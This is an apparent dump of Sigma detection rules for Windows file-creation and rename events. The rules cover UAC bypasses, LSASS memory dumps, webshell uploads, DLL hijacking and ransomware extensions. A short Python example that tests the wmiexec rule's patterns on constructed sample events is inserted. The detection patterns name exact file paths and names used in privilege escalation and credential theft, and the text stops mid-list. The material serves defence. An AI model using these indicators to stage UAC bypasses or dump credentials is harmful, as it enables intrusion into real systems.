    "content": "title: Potential Privilege Escalation Attempt Via .Exe.Local Technique\nid: 07a99744-56ac-40d2-97b7-2095967b0e03\nstatus: test\ndescription: Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"\nreferences:\n    - https://github.com/binderlabs/DirCreate2System\n    - https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt\nauthor: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)\ndate: 2022-12-16\nmodified: 2022-12-19\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith:\n            - 'C:\\Windows\\System32\\logonUI.exe.local'\n            - 'C:\\Windows\\System32\\werFault.exe.local'\n            - 'C:\\Windows\\System32\\consent.exe.local'\n            - 'C:\\Windows\\System32\\narrator.exe.local'\n            - 'C:\\Windows\\System32\\wermgr.exe.local'\n        TargetFilename|endswith: '\\comctl32.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump.yml",
    "content": "title: LSASS Process Memory Dump Creation Via Taskmgr.EXE\nid: 69ca12af-119d-44ed-b50f-a47af0ebc364\nstatus: test\ndescription: Detects the creation of an \"lsass.dmp\" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager.\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-10-19\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/987e3ca988ae3cff4b9f6e388c139c05bf44bbb8/atomics/T1003.001/T1003.001.md#L1\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - ':\\Windows\\system32\\taskmgr.exe'\n            - ':\\Windows\\SysWOW64\\taskmgr.exe'\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\lsass'\n            - '.DMP'\n    condition: selection\nfalsepositives:\n    - Rare case of troubleshooting by an administrator or support that has to be investigated regardless\nlevel: high\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_taskmgr_lsass_dump/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_tsclient_filewrite_startup.yml",
    "content": "title: Hijack Legit RDP Session to Move Laterally\nid: 52753ea4-b3a0-4365-910d-36cff487b789\nstatus: test\ndescription: Detects the usage of the tsclient share to place a backdoor in the RDP source machine's startup folder\nauthor: Samir Bousseaden\nreferences:\n    - Internal Research\ndate: 2019-02-21\nmodified: 2021-11-27\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\mstsc.exe'\n        TargetFilename|contains: '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_consent_comctl32.yml",
    "content": "title: UAC Bypass Using Consent and Comctl32 - File\nid: 62ed5b55-f991-406a-85d9-e8e8fdf18789\nstatus: test\ndescription: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\consent.exe.@'\n        TargetFilename|endswith: '\\comctl32.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml",
    "content": "title: UAC Bypass Using .NET Code Profiler on MMC\nid: 93a19907-d4f9-4deb-9f91-aac4692776a6\nstatus: test\ndescription: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|endswith: '\\AppData\\Local\\Temp\\pe386.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_eventvwr.yml",
    "content": "title: UAC Bypass Using EventVwr\nid: 63e4f530-65dc-49cc-8f80-ccfa95c69d43\nstatus: test\ndescription: Detects the pattern of a UAC bypass using Windows Event Viewer\nreferences:\n    - https://twitter.com/orange_8361/status/1518970259868626944?s=20&t=RFXqZjtA7tWM3HxqEH78Aw\n    - https://twitter.com/splinter_code/status/1519075134296006662?s=12&t=DLUXH86WtcmG_AZ5gY3C6g\n    - https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute\nauthor: Antonio Cocomazzi (idea), Florian Roth (Nextron Systems)\ndate: 2022-04-27\nmodified: 2022-11-22\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            # Removed the start just in case the logging backend doesn't expand ENV variables when they're used\n            - '\\Microsoft\\Event Viewer\\RecentViews'\n            - '\\Microsoft\\EventV~1\\RecentViews'\n    filter:\n        Image|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml",
    "content": "title: UAC Bypass Using IDiagnostic Profile - File\nid: 48ea844d-19b1-4642-944e-fe39c2cc1fec\nstatus: test\ndescription: Detects the creation of a file by \"dllhost.exe\" in the System32 directory as part of the \"IDiagnosticProfileUAC\" UAC bypass technique\nreferences:\n    - https://github.com/Wh04m1001/IDiagnosticProfileUAC\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-03\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\DllHost.exe'\n        TargetFilename|startswith: 'C:\\Windows\\System32\\'\n        TargetFilename|endswith: '.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_ieinstal.yml",
    "content": "title: UAC Bypass Using IEInstal - File\nid: bdd8157d-8e85-4397-bb82-f06cc9c71dbb\nstatus: test\ndescription: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image: 'C:\\Program Files\\Internet Explorer\\IEInstal.exe'\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\'\n        TargetFilename|endswith: 'consent.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_msconfig_gui.yml",
    "content": "title: UAC Bypass Using MSConfig Token Modification - File\nid: 41bb431f-56d8-4691-bb56-ed34e390906f\nstatus: test\ndescription: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|endswith: '\\AppData\\Local\\Temp\\pkgmgr.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_ntfs_reparse_point.yml",
    "content": "title: UAC Bypass Using NTFS Reparse Point - File\nid: 7fff6773-2baa-46de-a24a-b6eec1aba2d1\nstatus: test\ndescription: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|endswith: '\\AppData\\Local\\Temp\\api-ms-win-core-kernel32-legacy-l1.DLL'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_winsat.yml",
    "content": "title: UAC Bypass Abusing Winsat Path Parsing - File\nid: 155dbf56-e0a4-4dd0-8905-8a98705045e8\nstatus: test\ndescription: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|endswith:\n            - '\\AppData\\Local\\Temp\\system32\\winsat.exe'\n            - '\\AppData\\Local\\Temp\\system32\\winmm.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml",
    "content": "title: UAC Bypass Using Windows Media Player - File\nid: 68578b43-65df-4f81-9a9b-92f32711a951\nstatus: test\ndescription: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection1:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|endswith: '\\AppData\\Local\\Temp\\OskSupport.dll'\n    selection2:\n        Image: 'C:\\Windows\\system32\\DllHost.exe'\n        TargetFilename: 'C:\\Program Files\\Windows Media Player\\osk.exe'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml",
    "content": "title: VHD Image Download Via Browser\nid: 8468111a-ef07-4654-903b-b863a80bbc95\nstatus: test\ndescription: |\n    Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\n    Malware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\nreferences:\n    - https://redcanary.com/blog/intelligence-insights-october-2021/\n    - https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/\n    - https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/\nauthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'\ndate: 2021-10-25\nmodified: 2023-05-05\ntags:\n    - attack.resource-development\n    - attack.t1587.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\brave.exe'\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\iexplore.exe'\n            - '\\maxthon.exe'\n            - '\\MicrosoftEdge.exe'\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n            - '\\opera.exe'\n            - '\\safari.exe'\n            - '\\seamonkey.exe'\n            - '\\vivaldi.exe'\n            - '\\whale.exe'\n        # We don't use \"endswith\" to also match with ADS logs and \".vhdx\". Example: \"TargetFilename: C:\\Users\\xxx\\Downloads\\windows.vhd:Zone.Identifier\"\n        TargetFilename|contains: '.vhd'\n    condition: selection\nfalsepositives:\n    - Legitimate downloads of \".vhd\" files would also trigger this\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml",
    "content": "title: Visual Studio Code Tunnel Remote File Creation\nid: 56e05d41-ce99-4ecd-912d-93f019ee0b71\nstatus: test\ndescription: |\n    Detects the creation of a file by the \"node.exe\" process in the \".vscode-server\" directory. This could be a sign of remote file creation via the VsCode tunnel feature.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-25\ntags:\n    - attack.command-and-control\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|contains: '\\servers\\Stable-'\n        Image|endswith: '\\server\\node.exe'\n        TargetFilename|contains: '\\.vscode-server\\data\\User\\History\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml",
    "content": "title: Renamed VsCode Code Tunnel Execution - File Indicator\nid: d102b8f5-61dc-4e68-bd83-9a3187c67377\nstatus: test\ndescription: |\n    Detects the creation of a file with the name \"code_tunnel.json\", which indicates execution and usage of the VsCode tunneling utility by an \"Image\" or \"Process\" other than VsCode.\nreferences:\n    - https://ipfyx.fr/post/visual-studio-code-tunnel/\n    - https://badoption.eu/blog/2023/01/31/code_c2.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-10-25\ntags:\n    - attack.command-and-control\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\code_tunnel.json'\n    filter_main_legit_name:\n        # Note: There might be other legitimate names for VsCode. Please add them if found\n        Image|endswith:\n            - '\\code-tunnel.exe'\n            - '\\code.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml",
    "content": "title: Potential Webshell Creation On Static Website\nid: 39f1f9f2-9636-45de-98f6-a4046aa8e4b9\nstatus: test\ndescription: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.\nreferences:\n    - PT ESC rule and personal experience\n    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/c95a0a1a2855dc0cd7f7327614545fe30482a636/Upload%20Insecure%20Files/README.md\nauthor: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo\ndate: 2019-10-22\nmodified: 2023-10-15\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_wwwroot_path:\n        TargetFilename|contains: '\\inetpub\\wwwroot\\'\n    selection_wwwroot_ext:\n        TargetFilename|contains:\n            - '.ashx'\n            - '.asp'\n            - '.ph'\n            - '.soap'\n    selection_htdocs_path:\n        TargetFilename|contains:\n            - '\\www\\'\n            - '\\htdocs\\'\n            - '\\html\\'\n    selection_htdocs_ext:\n        TargetFilename|contains: '.ph'\n    # selection_tomcat_path:\n    #     TargetFilename|contains: '\\webapps\\ROOT'\n    # selection_tomcat_ext:\n    #     TargetFilename|contains:\n    #         - '.jsp' # .jspx, .jspf\n    #         - '.jsv'\n    #         - '.jsw'\n    filter_main_temp:  # FP when unpacking some executables in $TEMP\n        TargetFilename|contains:\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Windows\\Temp\\'\n    filter_main_system:\n        Image: 'System' # FP when backup/restore from drivers\n    filter_main_legitimate:\n        TargetFilename|contains: '\\xampp'\n    condition: (all of selection_wwwroot_* or all of selection_htdocs_*) and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate administrator or developer creating legitimate executable files in a web application folder\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml",
    "content": "title: Creation of WerFault.exe/Wer.dll in Unusual Folder\nid: 28a452f3-786c-4fd8-b8f2-bddbe9d616d1\nstatus: test\ndescription: Detects the creation of a file named \"WerFault.exe\" or \"wer.dll\" in an uncommon folder, which could be a sign of WerFault DLL hijacking.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/\nauthor: frack113\ndate: 2022-05-09\nmodified: 2025-12-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\WerFault.exe'\n            - '\\wer.dll'\n    filter_main_known_locations:\n        TargetFilename|startswith:\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n            - 'C:\\Windows\\UUS\\arm64\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_winrar_file_creation_in_startup_folder.yml",
    "content": "title: WinRAR Creating Files in Startup Locations\nid: 74a2b37d-fea4-41e0-9ac7-c9fbcf1f60cc\nstatus: experimental\ndescription: |\n    Detects WinRAR creating files in Windows startup locations, which may indicate an attempt to establish persistence by adding malicious files to the Startup folder.\n    This kind of behaviour has been associated with exploitation of the WinRAR path traversal vulnerabilities CVE-2025-6218 and CVE-2025-8088.\nreferences:\n    - https://github.com/mulwareX/CVE-2025-6218-POC\n    - https://x.com/0x534c/status/1944694507787710685\n    - https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-16\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\WinRAR.exe'\n            - '\\Rar.exe'\n        TargetFilename|contains: '\\Start Menu\\Programs\\Startup\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml",
    "content": "title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File\nid: d353dac0-1b41-46c2-820c-d7d2561fc6ed\nrelated:\n    - id: 074e0ded-6ced-4ebd-8b4d-53f55908119d\n      type: derived\nstatus: test\ndescription: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)\nreferences:\n    - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404\nauthor: Julia Fomina, oscd.community\ndate: 2020-10-06\nmodified: 2022-11-28\ntags:\n    - attack.defense-evasion\n    - attack.t1216\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    system_files:\n        TargetFilename|endswith:\n            - 'WsmPty.xsl'\n            - 'WsmTxt.xsl'\n    in_system_folder:\n        TargetFilename|startswith:\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n    condition: system_files and not in_system_folder\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml",
    "content": "title: WMI Persistence - Script Event Consumer File Write\nid: 33f41cdd-35ac-4ba8-814b-c6a4244a1ad4\nstatus: test\ndescription: Detects file writes of WMI script event consumer\nreferences:\n    - https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/\nauthor: Thomas Patzke\ndate: 2018-03-07\nmodified: 2021-11-27\ntags:\n    - attack.privilege-escalation\n    - attack.t1546.003\n    - attack.persistence\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image: 'C:\\WINDOWS\\system32\\wbem\\scrcons.exe'\n    condition: selection\nfalsepositives:\n    - Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_wmiexec_default_filename.yml",
    "content": "title: Wmiexec Default Output File\nid: 8d5aca11-22b3-4f22-b7ba-90e60533e1fb\nstatus: test\ndescription: Detects the creation of the default output filename used by the wmiexec tool\nreferences:\n    - https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/\n    - https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-06-02\nmodified: 2023-03-08\ntags:\n    - attack.lateral-movement\n    - attack.execution\n    - attack.t1047\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        - TargetFilename|re: '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' # Admin$\n        - TargetFilename|re: 'C:\\\\__1\\d{9}\\.\\d{1,7}$' # C$\n        - TargetFilename|re: 'D:\\\\__1\\d{9}\\.\\d{1,7}$' # D$\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
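The three `|re` patterns in the wmiexec rule above are unanchored regular-expression searches, so a short script is the clearest way to see what they do and do not match. The following Python is an added example and is not part of the Sigma repository or of impacket; the sample file-event records are constructed, and the `wmiexec_default_name` helper is an assumption modelled on the referenced wmiexec.py, which builds its output name from `__` followed by `str(time.time())`, which is why the patterns expect a ten-digit epoch value beginning with `1` followed by a fractional part.

```python
import re

# The three patterns from the "Wmiexec Default Output File" rule. Sigma's |re
# modifier is an unanchored search, so re.search() (not re.match()) is the
# right call; the trailing $ in the rule is what anchors the end of the name.
WMIEXEC_OUTPUT_PATTERNS = {
    "ADMIN$": re.compile(r"\\Windows\\__1\d{9}\.\d{1,7}$"),
    "C$": re.compile(r"C:\\__1\d{9}\.\d{1,7}$"),
    "D$": re.compile(r"D:\\__1\d{9}\.\d{1,7}$"),
}


def wmiexec_share_for(target_filename: str):
    """Return the share whose pattern matches TargetFilename, or None."""
    for share, pattern in WMIEXEC_OUTPUT_PATTERNS.items():
        if pattern.search(target_filename):
            return share
    return None


def is_wmiexec_output(target_filename: str) -> bool:
    return wmiexec_share_for(target_filename) is not None


def wmiexec_default_name(epoch_seconds: float) -> str:
    """Assumption modelled on the referenced wmiexec.py: the default output file
    name is '__' + str(time.time()), e.g. '__1718282880.1234567'. The tool itself
    picks the share and directory; this helper only builds the base name."""
    return "__" + str(epoch_seconds)


# Constructed sample file_event records (Sysmon Event ID 11 style), not real telemetry.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\cmd.exe", "TargetFilename": "C:\\Windows\\__1718282880.1234567"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "TargetFilename": "C:\\__1718282880.5"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "TargetFilename": "D:\\__1718282880.12"},
    # Benign look-alikes: wrong directory, no fractional part, extra suffix.
    {"Image": "C:\\Windows\\System32\\cmd.exe", "TargetFilename": "C:\\Users\\bob\\__1718282880.12"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "TargetFilename": "C:\\Windows\\__1718282880"},
    {"Image": "C:\\Windows\\System32\\cmd.exe", "TargetFilename": "C:\\Windows\\__1718282880.12.txt"},
]


def matching_events(events):
    """Apply the rule to a list of events; return (TargetFilename, share) pairs that fire."""
    return [(e["TargetFilename"], wmiexec_share_for(e["TargetFilename"]))
            for e in events if is_wmiexec_output(e["TargetFilename"])]


if __name__ == "__main__":
    for name, share in matching_events(SAMPLE_EVENTS):
        print(f"wmiexec output file on {share}: {name}")
```

Only the first three constructed records fire; the look-alikes fail on the directory, the missing fractional part or the trailing `.txt`, which is the point of the `$` anchor and the `\.\d{1,7}` group.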
  {
    "path": "rules/windows/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml",
    "content": "title: Wmiprvse Wbemcomn DLL Hijack - File\nid: 614a7e17-5643-4d89-b6fe-f9df1a79641c\nstatus: test\ndescription: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-10-12\nmodified: 2022-12-02\ntags:\n    - attack.execution\n    - attack.t1047\n    - attack.lateral-movement\n    - attack.t1021.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image: System\n        TargetFilename|endswith: '\\wbem\\wbemcomn.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml",
    "content": "title: UEFI Persistence Via Wpbbin - FileCreation\nid: e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f\nstatus: test\ndescription: Detects creation of a file named \"wpbbin.exe\" in the \"%systemroot%\\system32\\\" directory, which could be indicative of a UEFI-based persistence method (Windows Platform Binary Table)\nreferences:\n    - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c\n    - https://persistence-info.github.io/Data/wpbbin.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-18\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1542.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename: 'C:\\Windows\\System32\\wpbbin.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml",
    "content": "title: Writing Local Admin Share\nid: 4aafb0fa-bff5-4b9d-b99e-8093e659c65f\nstatus: test\ndescription: |\n    Adversaries may interact with a remote network share using Server Message Block (SMB); this rule looks for writes to the ADMIN$ share addressed through the loopback address (127.0.0.x).\n    This technique is used by post-exploitation frameworks.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share\nauthor: frack113\ndate: 2022-01-01\nmodified: 2022-08-13\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.lateral-movement\n    - attack.t1546.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains|all:\n            - '\\\\\\\\127.0.0'\n            - '\\ADMIN$\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_executable_detected/file_executable_detected_win_susp_embeded_sed_file.yml",
    "content": "title: Potentially Suspicious Self Extraction Directive File Created\nid: ab90dab8-c7da-4010-9193-563528cfa347\nrelated:\n    - id: 760e75d8-c3b5-409b-a9bf-6130b4c4603f\n      type: derived\nstatus: test\ndescription: |\n    Detects the creation of a binary file with the \".sed\" extension. The \".sed\" extension stands for Self Extraction Directive files.\n    These files are used by the \"iexpress.exe\" utility in order to create self extracting packages.\n    Attackers were seen abusing this utility and creating PE files with embedded \".sed\" entries.\n    Usually \".sed\" files are simple ini files and not PE binaries.\nreferences:\n    - https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html\n    - https://en.wikipedia.org/wiki/IExpress\n    - https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2024-02-05\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: file_executable_detected\ndetection:\n    selection:\n        TargetFilename|endswith: '.sed'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_rename/file_rename_win_ransomware.yml",
    "content": "title: Suspicious Appended Extension\nid: e3f673b3-65d1-4d80-9146-466f8b63fa99\nstatus: test\ndescription: Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\", etc.\nreferences:\n    - https://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/\n    - https://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/\nauthor: frack113\ndate: 2022-07-16\nmodified: 2023-11-11\ntags:\n    - attack.impact\n    - attack.t1486\nlogsource:\n    product: windows\n    category: file_rename\n    definition: 'Requirements: Microsoft-Windows-Kernel-File Provider with at least the KERNEL_FILE_KEYWORD_RENAME_SETLINK_PATH keyword'\ndetection:\n    selection:\n        SourceFilename|endswith:\n            - '.doc'\n            - '.docx'\n            - '.jpeg'\n            - '.jpg'\n            - '.lnk'\n            - '.pdf'\n            - '.png'\n            - '.pst'\n            - '.rtf'\n            - 